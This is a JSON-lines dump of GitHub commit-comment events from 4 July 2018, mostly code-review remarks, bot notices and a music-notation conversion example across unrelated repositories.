{"id":"7917542852","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-bookdown-feedstock"},"payload":{"comment":{"id":29592955,"position":null,"line":null,"path":null,"commit_id":"5285bbb3b77521d71d135886c88a7054b17dfde2","created_at":"2018-07-04T10:10:20Z","updated_at":"2018-07-04T10:10:20Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @conoria were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-04T10:10:20Z"}
{"id":"7917543507","type":"CommitCommentEvent","actor":{"login":"devashishmamgain"},"repo":{"name":"AppLozic/Applozic-Web-Plugin"},"payload":{"comment":{"id":29592956,"position":63,"line":4510,"path":"public/plugin/js/app/fullview/applozic.fullview.js","commit_id":"cde98f0c386af2dea4d1b4c45002f07d1a972ca3","created_at":"2018-07-04T10:10:28Z","updated_at":"2018-07-04T10:10:28Z","author_association":"MEMBER","body":"@ab14bhardwaj is file preview working with this change?"}},"created_at":"2018-07-04T10:10:28Z"}
{"id":"7917544367","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29592959,"position":null,"line":null,"path":null,"commit_id":"6b8fdff9d0322ab0b037960464453550258cad23","created_at":"2018-07-04T10:10:38Z","updated_at":"2018-07-04T10:10:38Z","author_association":"COLLABORATOR","body":"Puzzle `566-492b5668` disappeared from [`src/main/java/com/zerocracy/pmo/banks/FkBank.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pmo/banks/FkBank.java), that's why I closed #1068. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-04T10:10:38Z"}
{"id":"7917546032","type":"CommitCommentEvent","actor":{"login":"ettouilamine"},"repo":{"name":"ettouilamine/project_test"},"payload":{"comment":{"id":29592963,"position":null,"line":null,"path":null,"commit_id":"1b6d91abdaf77f7334e4ac18a6e6b453c7983ec7","created_at":"2018-07-04T10:10:59Z","updated_at":"2018-07-04T10:10:59Z","author_association":"OWNER","body":"test "}},"created_at":"2018-07-04T10:10:59Z"}
{"id":"7917548106","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29592970,"position":null,"line":null,"path":null,"commit_id":"0d4201bdeca4c1999f37838c77b58181e5ad4aec","created_at":"2018-07-04T10:11:23Z","updated_at":"2018-07-04T10:11:23Z","author_association":"CONTRIBUTOR","body":"This commit implements `note@breaksec` for breaking sub-beams in the Humdrum-to-MEI converter (both regular beams and grace-note beams, but not for chords or rests).\r\n\r\nExample:\r\n\r\n<img width=\"1386\" alt=\"screen shot 2018-07-04 at 12 01 39 pm\" src=\"https://user-images.githubusercontent.com/3487289/42271017-983017a2-7f82-11e8-8760-1ee21bc59bd9.png\">\r\n\r\n```\r\n**kern\r\n*M3/8\r\n=1\r\n16eLL\r\n16e\r\n16e\r\n32qdLLL<\r\n32qdJ\r\n32qdL\r\n32qdJJJ\r\n16e\r\n16e\r\n16eJJ\r\n=2\r\n16eLL\r\n16e\r\n16eJ\r\n32qfLLL<\r\n32qfJJ\r\n32qfLL\r\n32qfJJJ\r\n16eL\r\n16e\r\n16eJJ\r\n=3\r\n16eLL\r\n16eJ\r\n16eL\r\n16eJ\r\n16eL\r\n16eJJ\r\n=4\r\n32fLLL\r\n32f\r\n32fJ\r\n32fL\r\n32f\r\n32fJJJ\r\n32fLLL\r\n32f\r\n32fJJ\r\n32fLL\r\n32f\r\n32fJJJ\r\n==\r\n*-\r\n!!!RDF**kern: < = below\r\n```\r\n\r\nConversion to MEI:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-04T12:07:23\" version=\"2.0.0-dev-f0e1012\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n        <extMeta>\r\n            <frames xmlns:humxml=\"http://www.humdrum.org/ns/humxml\">\r\n                <metaFrame n=\"46\" token=\"!!!RDF**kern: &lt; = below\" xml:id=\"loc46\">\r\n                    <frameInfo>\r\n                        <startTime float=\"6\" />\r\n                        <frameType>reference</frameType>\r\n                        <referenceKey>RDF**kern</referenceKey>\r\n                        <referenceValue>&lt; = below</referenceValue>\r\n                    </frameInfo>\r\n                </metaFrame>\r\n            </frames>\r\n        </extMeta>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000001922242119\">\r\n                <score xml:id=\"score-0000000379308565\">\r\n                    <scoreDef xml:id=\"scoredef-0000000594898472\">\r\n                        <staffGrp xml:id=\"staffgrp-0000001948933727\">\r\n                            <staffDef xml:id=\"staffdef-0000001425625062\" clef.shape=\"G\" clef.line=\"2\" meter.count=\"3\" meter.unit=\"8\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000001862496385\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L3\" n=\"1\">\r\n                            <staff xml:id=\"staff-L3F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L3F1N1\" n=\"1\">\r\n                                    <beam xml:id=\"beam-L4F1-L13F1\">\r\n                                        <note xml:id=\"note-L4F1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L5F1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L6F1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <beam xml:id=\"beam-L7F1-L8F1\">\r\n                                            <note xml:id=\"note-L7F1\" dur=\"32\" oct=\"4\" pname=\"d\" grace=\"unacc\" stem.dir=\"down\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L8F1\" breaksec=\"2\" dur=\"32\" oct=\"4\" pname=\"d\" grace=\"unacc\" stem.dir=\"down\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L9F1\" dur=\"32\" oct=\"4\" pname=\"d\" grace=\"unacc\" stem.dir=\"down\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L10F1\" dur=\"32\" oct=\"4\" pname=\"d\" grace=\"unacc\" stem.dir=\"down\" accid.ges=\"n\" />\r\n                                        </beam>\r\n                                        <note xml:id=\"note-L11F1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L12F1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L13F1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                    </beam>\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L14\" n=\"2\">\r\n                            <staff xml:id=\"staff-L14F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L14F1N1\" n=\"1\">\r\n                                    <beam xml:id=\"beam-L15F1-L24F1\">\r\n                                        <note xml:id=\"note-L15F1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L16F1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L17F1\" breaksec=\"1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <beam xml:id=\"beam-L18F1-L19F1\">\r\n                                            <note xml:id=\"note-L18F1\" dur=\"32\" oct=\"4\" pname=\"f\" grace=\"unacc\" stem.dir=\"down\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L19F1\" breaksec=\"1\" dur=\"32\" oct=\"4\" pname=\"f\" grace=\"unacc\" stem.dir=\"down\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L20F1\" dur=\"32\" oct=\"4\" pname=\"f\" grace=\"unacc\" stem.dir=\"down\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L21F1\" dur=\"32\" oct=\"4\" pname=\"f\" grace=\"unacc\" stem.dir=\"down\" accid.ges=\"n\" />\r\n                                        </beam>\r\n                                        <note xml:id=\"note-L22F1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L23F1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L24F1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                    </beam>\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L25\" n=\"3\">\r\n                            <staff xml:id=\"staff-L25F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L25F1N1\" n=\"1\">\r\n                                    <beam xml:id=\"beam-L26F1-L31F1\">\r\n                                        <note xml:id=\"note-L26F1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L27F1\" breaksec=\"1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L28F1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L29F1\" breaksec=\"1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L30F1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L31F1\" dur=\"16\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                    </beam>\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L32\" right=\"end\" n=\"4\">\r\n                            <staff xml:id=\"staff-L32F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L32F1N1\" n=\"1\">\r\n                                    <beam xml:id=\"beam-L33F1-L38F1\">\r\n                                        <note xml:id=\"note-L33F1\" dur=\"32\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L34F1\" dur=\"32\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L35F1\" breaksec=\"2\" dur=\"32\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L36F1\" dur=\"32\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L37F1\" dur=\"32\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L38F1\" dur=\"32\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                    </beam>\r\n                                    <beam xml:id=\"beam-L39F1-L44F1\">\r\n                                        <note xml:id=\"note-L39F1\" dur=\"32\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L40F1\" dur=\"32\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L41F1\" breaksec=\"1\" dur=\"32\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L42F1\" dur=\"32\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L43F1\" dur=\"32\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L44F1\" dur=\"32\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                    </beam>\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```"}},"created_at":"2018-07-04T10:11:23Z"}
{"id":"7917551430","type":"CommitCommentEvent","actor":{"login":"ondrejmirtes"},"repo":{"name":"phpstan/phpstan-shim"},"payload":{"comment":{"id":29592977,"position":null,"line":null,"path":null,"commit_id":"0db0041624bd0ccbcf944be6a86880e8663fc3e2","created_at":"2018-07-04T10:12:02Z","updated_at":"2018-07-04T10:12:02Z","author_association":"MEMBER","body":"Please test the current dev-master of `phpstan-shim` if it works better.\r\n\r\nThis PHAR already contains `nikic/php-parser`."}},"created_at":"2018-07-04T10:12:02Z"}
{"id":"7917553129","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29592984,"position":null,"line":null,"path":null,"commit_id":"ac29bd0c72b292c10e988a026df3ba2d3aaeda33","created_at":"2018-07-04T10:12:23Z","updated_at":"2018-07-04T10:12:23Z","author_association":"CONTRIBUTOR","body":"@killerwife can you have a look at this, please? Thanks to this commit, I tried to make NPC 11662 immune to Curse of Tongues and Mind-numbing Poison (Sulfuron Harbinger adds) with:\r\n``` SQL\r\nUPDATE creature_template SET ExtraFlags=4194304 WHERE Entry=11662;\r\n```\r\nBut when in-game I have a warlock casting Curse of Tongues (rank 1 or 2) on creature 11662, the spell still applies instead of receiving an 'Immune' message.\r\n\r\nI did not check on TBC no WotLK, I no longer have access to these until my PC is fixed/replaced."}},"created_at":"2018-07-04T10:12:23Z"}
{"id":"7917557702","type":"CommitCommentEvent","actor":{"login":"alalek"},"repo":{"name":"opencv/opencv_3rdparty"},"payload":{"comment":{"id":29592985,"position":null,"line":null,"path":null,"commit_id":"8afa57abc8229d611c4937165d20e2a2d9fc5a12","created_at":"2018-07-04T10:13:18Z","updated_at":"2018-07-04T10:13:18Z","author_association":"CONTRIBUTOR","body":"@cedriclmenard Could you please open an issue in [opencv_contrib](https://github.com/opencv/opencv_contrib/issues) repository? It is hard to track issues via commit comments."}},"created_at":"2018-07-04T10:13:18Z"}
{"id":"7917561343","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29592989,"position":14,"line":25,"path":"tests/sdhci-test.c","commit_id":"7f000f95c99de411cb2943090dd4ca48d8abef3f","created_at":"2018-07-04T10:14:01Z","updated_at":"2018-07-04T10:14:01Z","author_association":"NONE","body":"This struct is unused, so you can put it under `#if 0` too."}},"created_at":"2018-07-04T10:14:01Z"}
{"id":"7917562593","type":"CommitCommentEvent","actor":{"login":"csadesz"},"repo":{"name":"green-fox-academy/mzsolt68"},"payload":{"comment":{"id":29592990,"position":null,"line":null,"path":null,"commit_id":"f0a39ddbe88e7a77aaf9f74f381c2335dd65832f","created_at":"2018-07-04T10:14:16Z","updated_at":"2018-07-04T10:14:16Z","author_association":"NONE","body":"You should try to follow a styleguide of commit messages, for example: \r\n\r\nhttps://gist.github.com/stephenparish/9941e89d80e2bc58a153"}},"created_at":"2018-07-04T10:14:16Z"}
{"id":"7917565423","type":"CommitCommentEvent","actor":{"login":"Jan-E"},"repo":{"name":"Jan-E/v8js"},"payload":{"comment":{"id":29592997,"position":5,"line":214,"path":"v8js_v8object_class.cc","commit_id":"0a12ac19d8afa13a435d23be05fa15b2931be67d","created_at":"2018-07-04T10:14:49Z","updated_at":"2018-07-04T10:14:49Z","author_association":"OWNER","body":"It crossed my mind as well, but the declaration is at the beginning of a {} block, so it should be no problem."}},"created_at":"2018-07-04T10:14:49Z"}
{"id":"7917565483","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29592998,"position":5,"line":5,"path":"tests/qgraph/qsdhci.c","commit_id":"c1b0b974ae0cb10ac7af059799fb5fc9f019de53","created_at":"2018-07-04T10:14:49Z","updated_at":"2018-07-04T10:14:49Z","author_association":"NONE","body":"Can you rename everything from qsdhci to sdhci?"}},"created_at":"2018-07-04T10:14:49Z"}
{"id":"7917566657","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29593001,"position":11,"line":11,"path":"tests/qgraph/qsdhci.c","commit_id":"c1b0b974ae0cb10ac7af059799fb5fc9f019de53","created_at":"2018-07-04T10:15:05Z","updated_at":"2018-07-04T10:15:05Z","author_association":"NONE","body":"Please rename common_fields to props or something like that."}},"created_at":"2018-07-04T10:15:05Z"}
{"id":"7917568161","type":"CommitCommentEvent","actor":{"login":"marvin098"},"repo":{"name":"lxkn/RateUsersSkills"},"payload":{"comment":{"id":29593005,"position":9,"line":8,"path":"server.js","commit_id":"d2776fa6da52cc56099ef3609f20805aab7ca353","created_at":"2018-07-04T10:15:21Z","updated_at":"2018-07-04T10:15:21Z","author_association":"NONE","body":"Po co piszesz w komentarzu co robi ta linijka jak to jest self-documented code"}},"created_at":"2018-07-04T10:15:21Z"}
{"id":"7917568408","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29593006,"position":17,"line":17,"path":"tests/qgraph/qsdhci.c","commit_id":"c1b0b974ae0cb10ac7af059799fb5fc9f019de53","created_at":"2018-07-04T10:15:25Z","updated_at":"2018-07-04T10:15:25Z","author_association":"NONE","body":"No \"#####\", just\r\n\r\n    /* Memory mapped implementation of QSDHCI.  */"}},"created_at":"2018-07-04T10:15:25Z"}
{"id":"7917568771","type":"CommitCommentEvent","actor":{"login":"csadesz"},"repo":{"name":"green-fox-academy/mzsolt68"},"payload":{"comment":{"id":29593008,"position":null,"line":null,"path":null,"commit_id":"5da643b168cfb9a366ca14c078e6e644c4dd3119","created_at":"2018-07-04T10:15:29Z","updated_at":"2018-07-04T10:15:29Z","author_association":"NONE","body":"Good namings, nice looking code! :)"}},"created_at":"2018-07-04T10:15:29Z"}
{"id":"7917569811","type":"CommitCommentEvent","actor":{"login":"bluehood"},"repo":{"name":"root-project/root"},"payload":{"comment":{"id":29593010,"position":7,"line":243,"path":"tree/dataframe/src/RDFNodes.cxx","commit_id":"a793f5f4a8036a84767bf032ffd23616971a5d60","created_at":"2018-07-04T10:15:42Z","updated_at":"2018-07-04T10:15:42Z","author_association":"MEMBER","body":"this should call `ClearTask`, not `ClearValueReaders`"}},"created_at":"2018-07-04T10:15:42Z"}
{"id":"7917570556","type":"CommitCommentEvent","actor":{"login":"marvin098"},"repo":{"name":"lxkn/RateUsersSkills"},"payload":{"comment":{"id":29593011,"position":7,"line":7,"path":"models/user.js","commit_id":"d2776fa6da52cc56099ef3609f20805aab7ca353","created_at":"2018-07-04T10:15:51Z","updated_at":"2018-07-04T10:15:51Z","author_association":"NONE","body":"Hasła trzymane w stringu"}},"created_at":"2018-07-04T10:15:51Z"}
{"id":"7917574066","type":"CommitCommentEvent","actor":{"login":"mattkrupnik"},"repo":{"name":"PayU/plugin_magento_2"},"payload":{"comment":{"id":29593014,"position":null,"line":null,"path":null,"commit_id":"043e8d33dde586750cd70e3dd15f6b1bbeae3e1a","created_at":"2018-07-04T10:16:32Z","updated_at":"2018-07-04T10:16:32Z","author_association":"NONE","body":"W dalszym ciągu brak podsumowania w mailach."}},"created_at":"2018-07-04T10:16:32Z"}
{"id":"7917574410","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29593017,"position":86,"line":86,"path":"tests/qgraph/qsdhci.c","commit_id":"c1b0b974ae0cb10ac7af059799fb5fc9f019de53","created_at":"2018-07-04T10:16:36Z","updated_at":"2018-07-04T10:16:36Z","author_association":"NONE","body":"Please place this function in tests/libqos/pci.c, and move it to the patch qgraph-ifies PCI."}},"created_at":"2018-07-04T10:16:36Z"}
{"id":"7917581528","type":"CommitCommentEvent","actor":{"login":"hanyoungkim"},"repo":{"name":"hanyoungkim/lucas_house"},"payload":{"comment":{"id":29593025,"position":null,"line":null,"path":null,"commit_id":"76b5d611b9c1c87c113f2a6b9884956a103d6c44","created_at":"2018-07-04T10:18:03Z","updated_at":"2018-07-04T10:18:03Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-04T10:18:03Z"}
{"id":"7917584376","type":"CommitCommentEvent","actor":{"login":"hanyoungkim"},"repo":{"name":"hanyoungkim/lucas_house"},"payload":{"comment":{"id":29593031,"position":null,"line":null,"path":null,"commit_id":"8ee405fda537449f97ad575f56b92cf81354d022","created_at":"2018-07-04T10:18:37Z","updated_at":"2018-07-04T10:18:37Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-04T10:18:37Z"}
{"id":"7917585710","type":"CommitCommentEvent","actor":{"login":"detobel36"},"repo":{"name":"gvlfm78/BukkitOldCombatMechanics"},"payload":{"comment":{"id":29593035,"position":23,"line":48,"path":"src/main/java/gvlfm78/plugin/OldCombatMechanics/module/ModuleDisableEnderpearlCooldown.java","commit_id":"5841b4be64c55cf01ab14ff75f6796da458e1364","created_at":"2018-07-04T10:18:53Z","updated_at":"2018-07-04T10:18:53Z","author_association":"CONTRIBUTOR","body":"You don't use `offhand` variable :smiley: "}},"created_at":"2018-07-04T10:18:53Z"}
{"id":"7917586136","type":"CommitCommentEvent","actor":{"login":"hanyoungkim"},"repo":{"name":"hanyoungkim/lucas_house"},"payload":{"comment":{"id":29593036,"position":null,"line":null,"path":null,"commit_id":"a1041bcad1191cc41edfdb15476d50bbc65873cc","created_at":"2018-07-04T10:18:58Z","updated_at":"2018-07-04T10:18:58Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-04T10:18:58Z"}
{"id":"7917588414","type":"CommitCommentEvent","actor":{"login":"hanyoungkim"},"repo":{"name":"hanyoungkim/lucas_house"},"payload":{"comment":{"id":29593039,"position":null,"line":null,"path":null,"commit_id":"113b53a7a343bccc17e04a906264d476c6a69295","created_at":"2018-07-04T10:19:25Z","updated_at":"2018-07-04T10:19:25Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-04T10:19:25Z"}
{"id":"7917590651","type":"CommitCommentEvent","actor":{"login":"alphapapa"},"repo":{"name":"alphapapa/magit-todos"},"payload":{"comment":{"id":29593045,"position":null,"line":null,"path":null,"commit_id":"30b42000e81dbb0ce4dc79fa0797af7ef52c3c76","created_at":"2018-07-04T10:19:55Z","updated_at":"2018-07-04T10:19:55Z","author_association":"OWNER","body":"@zhaojiangbin If you are interested, please let me know what you think of this branch. It is in preparation for eventually adding the pop-up UI.\r\n\r\nAlso, what do you think of dropping support for ag? It cannot seem to output results in the same format as the other scanners, which complicates the code, and I'm not sure that supporting it adds much value and is worth the trouble. However, if there are any platforms that it's the best choice on, we should probably keep it. \r\n\r\nThanks."}},"created_at":"2018-07-04T10:19:55Z"}
{"id":"7917590828","type":"CommitCommentEvent","actor":{"login":"LMontsi"},"repo":{"name":"LMontsi/testrepo"},"payload":{"comment":{"id":29593047,"position":null,"line":null,"path":null,"commit_id":"b281248c79a51462eacd08e2ec2eeb1b46789f73","created_at":"2018-07-04T10:19:57Z","updated_at":"2018-07-04T10:19:57Z","author_association":"OWNER","body":"deleted files"}},"created_at":"2018-07-04T10:19:57Z"}
{"id":"7917593360","type":"CommitCommentEvent","actor":{"login":"leezer3"},"repo":{"name":"leezer3/OpenBVE"},"payload":{"comment":{"id":29593054,"position":null,"line":null,"path":null,"commit_id":"7fdf562dc4ca0812b49e1f3376d1e7a3b900d351","created_at":"2018-07-04T10:20:28Z","updated_at":"2018-07-04T10:20:28Z","author_association":"OWNER","body":"Should make most PRs work without having to mess with the makefile.\r\nWindows incompatible, but the makefile has never been tested on CygWin anyways."}},"created_at":"2018-07-04T10:20:28Z"}
{"id":"7917596137","type":"CommitCommentEvent","actor":{"login":"marvin098"},"repo":{"name":"lxkn/RateUsersSkills"},"payload":{"comment":{"id":29593063,"position":13,"line":13,"path":"public/controllers/loginController.js","commit_id":"8ee84fbd4802c7a2f9f5394596931be95c112b52","created_at":"2018-07-04T10:21:02Z","updated_at":"2018-07-04T10:21:02Z","author_association":"NONE","body":"Pobranie wszystkich userow i przejscie w petli po ich wszystkich porownujac username i password ?\r\n\r\n1. Co w przypadku kiedy mamy 2 userow i takimsamym username i hasle ? Nie ma sprawdzania czy username juz jest zajety.\r\n2.Pomyslales jaki impact na performance bedzie miala apka ktora dla kazdego logowania bedzie przechodzic po wszystkich userach ?"}},"created_at":"2018-07-04T10:21:02Z"}
{"id":"7917600294","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29593067,"position":27,"line":411,"path":"tests/qgraph/test-qgraph.c","commit_id":"c1b0b974ae0cb10ac7af059799fb5fc9f019de53","created_at":"2018-07-04T10:21:55Z","updated_at":"2018-07-04T10:21:55Z","author_association":"NONE","body":"For these tests, let's move them to a separate patch, and not include them in the first submission to qemu-devel. Later, we'll decide what to do about them (the issue being that these are unit tests, not qtests, and should not need `QTEST_QEMU_BINARY`.\r\n\r\nTo split the patch in `git rebase -i` do something like this:\r\n* mark the patch before this one as `edit`\r\n* copy to the clipboard the SHA1 hash of this patch\r\n* use `git checkout -p` and `git commit` to extract the test to a separate patch\r\n* repeat for other patches that add this kind of test\r\n* at the end, squash together all the patches you have created, and move them at the end of the series"}},"created_at":"2018-07-04T10:21:55Z"}
{"id":"7917600312","type":"CommitCommentEvent","actor":{"login":"marvin098"},"repo":{"name":"lxkn/RateUsersSkills"},"payload":{"comment":{"id":29593068,"position":18,"line":18,"path":"public/controllers/loginController.js","commit_id":"8ee84fbd4802c7a2f9f5394596931be95c112b52","created_at":"2018-07-04T10:21:56Z","updated_at":"2018-07-04T10:21:56Z","author_association":"NONE","body":"Niepotrzebny komentarz"}},"created_at":"2018-07-04T10:21:56Z"}
{"id":"7917608999","type":"CommitCommentEvent","actor":{"login":"hathach"},"repo":{"name":"adafruit/circuitpython"},"payload":{"comment":{"id":29593092,"position":null,"line":null,"path":null,"commit_id":"7fff7f5e70c652ccffce2a598a4e3b7df92ad67b","created_at":"2018-07-04T10:23:48Z","updated_at":"2018-07-04T10:23:48Z","author_association":"MEMBER","body":"just added CDC as well, it won't do anything yet. just show up the interface to make sure we got basic right :D "}},"created_at":"2018-07-04T10:23:48Z"}
{"id":"7917609100","type":"CommitCommentEvent","actor":{"login":"hanyoungkim"},"repo":{"name":"hanyoungkim/lucas_house"},"payload":{"comment":{"id":29593093,"position":null,"line":null,"path":null,"commit_id":"44b1f674c39ef319645942bd564aa42ea931020f","created_at":"2018-07-04T10:23:50Z","updated_at":"2018-07-04T10:23:50Z","author_association":"OWNER","body":"css"}},"created_at":"2018-07-04T10:23:50Z"}
{"id":"7917610001","type":"CommitCommentEvent","actor":{"login":"marvin098"},"repo":{"name":"lxkn/RateUsersSkills"},"payload":{"comment":{"id":29593095,"position":28,"line":28,"path":"public/controllers/registerController.js","commit_id":"8ee84fbd4802c7a2f9f5394596931be95c112b52","created_at":"2018-07-04T10:24:02Z","updated_at":"2018-07-04T10:24:02Z","author_association":"NONE","body":"Password is not equal to confirm password ????? "}},"created_at":"2018-07-04T10:24:02Z"}
{"id":"7917612743","type":"CommitCommentEvent","actor":{"login":"hanyoungkim"},"repo":{"name":"hanyoungkim/lucas_house"},"payload":{"comment":{"id":29593102,"position":null,"line":null,"path":null,"commit_id":"c7c97545dddee3b586a70124627d1474273e54b6","created_at":"2018-07-04T10:24:35Z","updated_at":"2018-07-04T10:24:35Z","author_association":"OWNER","body":"css"}},"created_at":"2018-07-04T10:24:35Z"}
{"id":"7917614453","type":"CommitCommentEvent","actor":{"login":"hanyoungkim"},"repo":{"name":"hanyoungkim/lucas_house"},"payload":{"comment":{"id":29593105,"position":null,"line":null,"path":null,"commit_id":"20f17c431d9f0967d198e8cb1f2240dacac32705","created_at":"2018-07-04T10:24:57Z","updated_at":"2018-07-04T10:24:57Z","author_association":"OWNER","body":"css"}},"created_at":"2018-07-04T10:24:57Z"}
{"id":"7917615164","type":"CommitCommentEvent","actor":{"login":"giacomolm"},"repo":{"name":"NHS-digital-website/hippo"},"payload":{"comment":{"id":29593107,"position":5,"line":146,"path":"repository-data/application/src/main/resources/hcm-config/hst/configurations/common/sitemap.yaml","commit_id":"4277c63b8091537e8d7b1537642816fe0204990f","created_at":"2018-07-04T10:25:05Z","updated_at":"2018-07-04T10:25:05Z","author_association":"CONTRIBUTOR","body":"Hi Rob, if you look at the commit here [1] you can find the configuration duplicated, this was a mistake and removed by the subsequent (this) commit \r\n\r\n[1] https://github.com/NHS-digital-website/hippo/blob/b2a1a0401a792114a63408b3f7a714c8ac2a461a/repository-data/application/src/main/resources/hcm-config/hst/configurations/common/sitemap.yaml"}},"created_at":"2018-07-04T10:25:05Z"}
